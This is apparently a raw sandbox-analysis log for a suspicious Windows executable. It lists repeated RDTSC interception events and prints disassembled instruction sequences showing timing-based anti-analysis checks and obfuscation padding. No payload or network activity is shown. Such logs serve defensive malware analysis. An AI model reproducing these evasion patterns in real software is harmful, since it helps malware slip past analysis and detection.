Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A1E67 second address: 16A1E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FB6E8B0AEECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A0166 second address: 16A016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A3685 second address: 16A3689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A3689 second address: 16A368D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A368D second address: 16A3693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A4602 second address: 16A4614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b ja 00007FB6E8B0C7E6h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A93FF second address: 16A9405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A9405 second address: 16A940F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16A940F second address: 16A9420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB6E8B0AED6h 0x0000000a jbe 00007FB6E8B0AED6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16463DA second address: 16463DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16463DE second address: 16463E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1642E19 second address: 1642E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1642E23 second address: 1642E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AB565 second address: 16AB587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB6E8B0C7EDh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 ja 00007FB6E8B0C7ECh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AB587 second address: 16AB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB6E8B0AEDCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AE2D6 second address: 16AE2DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AE2DE second address: 16AE2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AFD6E second address: 16AFD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AFD77 second address: 16AFD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AFD7B second address: 16AFD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B2FE2 second address: 16B2FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B316F second address: 16B319F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FB6E8B0C7F9h 0x00000013 popad 0x00000014 jbe 00007FB6E8B0C7E8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B319F second address: 16B31BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B31BC second address: 16B31C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B31C2 second address: 16B31C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B34E3 second address: 16B34EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B34EC second address: 16B34FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BA696 second address: 16BA6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BEEFC second address: 16BEF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BF2C4 second address: 16BF2D6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6E8B0C7E6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BF2D6 second address: 16BF2E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007FB6E8B0AEDEh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C3E26 second address: 16C3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C3F81 second address: 16C3F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C3F87 second address: 16C3FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FB6E8B0C7E6h 0x00000010 jns 00007FB6E8B0C7E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C414D second address: 16C4152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C44A3 second address: 16C44A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4906 second address: 16C490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C490A second address: 16C4926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4926 second address: 16C4930 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6E8B0AED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4930 second address: 16C493C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C493C second address: 16C4940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4940 second address: 16C4966 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007FB6E8B0C7E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6E8B0C7F2h 0x00000013 jnc 00007FB6E8B0C7E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4966 second address: 16C496A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C496A second address: 16C49A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FB6E8B0C7F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C49A4 second address: 16C49A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4C99 second address: 16C4CA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4F35 second address: 16C4F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4F39 second address: 16C4F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB6E8B0C7EEh 0x0000000c jnp 00007FB6E8B0C7E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jmp 00007FB6E8B0C7EEh 0x0000001c pop ecx 0x0000001d push ebx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C9EBD second address: 16C9EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16CE683 second address: 16CE6B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EEh 0x00000007 jng 00007FB6E8B0C7E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB6E8B0C7F1h 0x00000018 jng 00007FB6E8B0C7E6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16CE6B6 second address: 16CE6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D3056 second address: 16D307C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push esi 0x0000000a jmp 00007FB6E8B0C7F8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D307C second address: 16D3080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D3080 second address: 16D3084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16893B7 second address: 1689403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FB6E8B0AED8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+129C197Eh], edi 0x00000027 clc 0x00000028 lea eax, dword ptr [ebp+12B7B100h] 0x0000002e jmp 00007FB6E8B0AEE1h 0x00000033 nop 0x00000034 push esi 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689403 second address: 1689424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB6E8B0C7F7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689896 second address: 16898A8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB6E8B0AED6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16898A8 second address: 16898BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FB6E8B0C7E8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689BCD second address: 1689BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689D87 second address: 1689D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A55D second address: 168A561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A561 second address: 168A565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A5EC second address: 168A604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6E8B0AEE0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A604 second address: 168A67D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FB6E8B0C7E8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 adc dl, 00000055h 0x00000027 lea eax, dword ptr [ebp+12B7B144h] 0x0000002d sub dword ptr [ebp+129C384Dh], edi 0x00000033 xor edi, 78D9A94Fh 0x00000039 push eax 0x0000003a push eax 0x0000003b jne 00007FB6E8B0C7E8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp], eax 0x00000045 jng 00007FB6E8B0C7E6h 0x0000004b lea eax, dword ptr [ebp+12B7B100h] 0x00000051 xor edx, dword ptr [ebp+129C2A6Ah] 0x00000057 push eax 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A67D second address: 168A681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A681 second address: 166EDEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FB6E8B0C7E8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call dword ptr [ebp+129C1A68h] 0x0000002a push esi 0x0000002b jmp 00007FB6E8B0C7F3h 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D22DD second address: 16D22FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE0h 0x00000009 pop ebx 0x0000000a jno 00007FB6E8B0AEDAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D22FC second address: 16D2340 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0C802h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FB6E8B0C7E6h 0x00000010 jmp 00007FB6E8B0C7F8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2340 second address: 16D2344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2344 second address: 16D2355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB6E8B0C7F4h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2660 second address: 16D2664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2664 second address: 16D2670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB6E8B0C7E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2670 second address: 16D2685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2BFE second address: 16D2C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D5EB8 second address: 16D5EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D5EBF second address: 16D5EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D9EA5 second address: 16D9ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE5h 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FB6E8B0AEDEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D9A22 second address: 16D9A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCC8A second address: 16DCC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCC8E second address: 16DCC94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCC94 second address: 16DCC9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCDFE second address: 16DCE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FB6E8B0C7FCh 0x0000000c jmp 00007FB6E8B0C7F0h 0x00000011 js 00007FB6E8B0C7E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCE20 second address: 16DCE3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCE3C second address: 16DCE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FB6E8B0C7E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCE49 second address: 16DCE5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2AE2 second address: 16E2AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2C64 second address: 16E2C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB6E8B0AEE0h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007FB6E8B0AEE8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2C99 second address: 16E2C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2E1E second address: 16E2E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
